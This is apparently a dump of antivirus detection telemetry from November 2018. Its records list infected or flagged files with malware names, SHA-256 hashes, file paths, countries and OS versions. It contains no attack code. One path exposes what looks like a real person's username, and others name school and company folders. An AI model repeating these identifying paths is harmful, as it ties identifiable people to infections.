  Row(detection=Row(filename='dxae0a1.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaE0A0.tmp\\dxaE0A1.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T10:31:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:32:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0007ea07', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp0007ea07', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:44:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='usbswitchtool.exe', filepath='D:\\7\\BackUp Files\\New Download\\Installer\\BOX\\MRT\\mrt_2.58_lastupdate\\date\\mtk_imei\\USBSwitchTool.exe', filesize=1280000, name='W32/Sality.AG.#M1.#R1'), hash='5b996c9aa65a4136f6ed35c1b5cf51bb5cb74ca9afe99248c0930925a0c17c47', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-01T02:15:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='11d5167e9542b2084638bfee2e987fe11f2201a4f746161fd3879aed097607ab', metadata=Row(cmdline=None, country='GA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T05:00:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-132514-54fd26d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b4440628\\AVSCAN-20181101-132455-51B9A79F\\AVSCAN-20181101-132514-54FD26D6', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:25:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='2b209fd5ec196d877a8c0bfd5f3b175c2d7177e813b32abe40f371c704e4ece2', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T15:40:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:57:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rasphone.exe', filepath='C:\\Windows.old.000\\Windows\\System32\\rasphone.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='2082b713642913cf0cb92c8ae9cd69f8e38fc74467795d38baf8616a0a64d829', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T02:46:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa8712.40780\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa8712.40780\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:52:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upgradedownload.exe', filepath='C:\\Users\\X\\Desktop\\Desktop\\Exmobile Software\\E9\\UPGRADEDOWNLOAD_R2.9.9009\\Bin\\UpgradeDownload.exe', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='7f3fcb520e4b13a3be79c80bb864f5daa7d9c948baadaf0e87afbcb3bc4b2a49', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T15:27:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qtwcodecsd4.dll', filepath='\\\\terminal-04\\d\\online games\\steam\\steamapps\\common\\dota 2 beta\\game\\bin\\win32\\qt_plugins\\codecs\\qtwcodecsd4.dll', filesize=576000, name='W32/Ramnit.C.#M1.#R1'), hash='52ee3b80822eff5e263376a2c5ded1074043a7112ffaf7f8d56bd58da6262c31', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:14:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6108.5594\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6108.5594\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:54:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174520-199da770', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-174520-199DA770', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:45:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0113434.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0113434.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:34:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\rozbalene\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\rozbalene\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:39:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa8200.7024\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa8200.7024\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:36:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_1e767269.exe', filepath='\\\\?\\C:\\Applications\\Service_1e767269.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3336.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3336.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='engim varie.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='disableusbwin7.exe', filepath='K:\\HBCD\\Programs\\DISABLEUSBWIN7.EXE', filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205723-da51675b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_696068c8\\AVSCAN-20181101-205523-C073CBF2\\AVSCAN-20181101-205723-DA51675B', filesize=1280000, name='TR/Agent.tyhsb.#M1.#R1'), hash='cc53c0083b2158bb6abafdab0da31474d97548d4a40f33de09f8bac83f8d98e5', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:57:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093735-af9cf238', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093735-AF9CF238', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:37:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='comms.dll', filepath='C:\\Users\\X\\Downloads\\Telegram Desktop\\FINGERPRINT\\SDK\\SDK VB 6 & Delphi\\comms.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='b799ac02fd61704822e2891d776a400c49fff137b2c9f9bd517c872ce67843c8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:57:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='infanzia.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI\\INFANZIA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pelatihan asesor.exe', filepath='F:\\\xa0\\PELATIHAN ASESOR\\PELATIHAN ASESOR.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\e1zbtnvzbgm\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:55:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-085607-d3d730ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_08419da6\\AVSCAN-20181101-085507-CB904B89\\AVSCAN-20181101-085607-D3D730EF', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:56:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095734-95635834', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095734-95635834', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150224-b0495b35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-150224-B0495B35', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:02:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094915-35db92f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094915-35DB92F0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:49:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201546-2416a5a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae893140\\AVSCAN-20181101-200910-F22492D2\\AVSCAN-20181101-201546-2416A5A0', filesize=256000, name='TR/AD.Inject.Y.#M1.#R1'), hash='9d6d3b95598efbfde9027931f8c12f8aedfdf33a0e75cdca7b900b4e77dead91', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101640-58c1401d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_223726da\\AVSCAN-20181101-101623-558AF057\\AVSCAN-20181101-101640-58C1401D', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:17:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='proposta 27 maggio 2016.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\PROPOSTA 27 MAGGIO 2016.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a464cfca96ded1ffdda173e691e6267d3989466383a09e803f720b37862c254c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A464CFCA96DED1FFDDA173E691E6267D3989466383A09E803F720B37862C254C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a464cfca96ded1ffdda173e691e6267d3989466383a09e803f720b37862c254c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:14:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095421-708b0b36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095421-708B0B36', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:54:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='logo.exe', filepath='F:\\logo\\logo.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:35:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\euvjjfehccg\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541047326.5bda841eaeb5f', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Backs\\597010319.exe', parentsize=671232, timestamp='2018-11-01T05:01:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.bat', filepath='E:\\uepdorimdg.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-180345-4904dc97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be695c43\\AVSCAN-20181104-180330-46912E2C\\AVSCAN-20181104-180345-4904DC97', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:03:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132803-63641223', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132803-63641223', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:28:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2391280, timestamp='2018-11-04T11:22:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='47c79fb812532097cc767b9606ed9384.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_105923187\\47c79fb812532097cc767b9606ed9384.smp', filesize=1000000, name='TR/Dropper.Gen.#M300.#R3322'), hash='70dc36bf3f1ccab13ff31eb1ae038476a17c2c4c8e94a634d2243d8d79ce2616', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T22:22:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T05:20:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='klist.exe', filepath='C:\\PROGRAM FILES\\Java\\jre6\\bin\\klist.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='10d2130d74f865e07070f7b13e8a9da1148fb35800e320b12ec9360d89faa37e', metadata=Row(cmdline='-service', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Software Informer\\softinfo.exe', parentsize=1103360, timestamp='2018-11-04T05:15:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T23:52:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193729-52f4d6a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d78ce995\\AVSCAN-20181104-192917-19E5130F\\AVSCAN-20181104-193729-52F4D6A6', filesize=192000, name='TR/Crypt.ZPACK.Gen2.#M1.#R1'), hash='65f0003ea06ad84804be978a6f5ccc34aedb28f1e4ae2717c206fee32d098ddf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:37:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2606787\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-04T21:46:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='scmini.exe', filepath='\\\\?\\C:\\Program Files (x86)\\SmartCloudInput\\1.3.6.10910\\SCMiNi.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='4f5d72478c0ea865608bea5bc11b1c4fcacf7272a9921e2aa26027d362cd030c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:35:59Z'), dt=datetime.date(2018, 11, 4)),
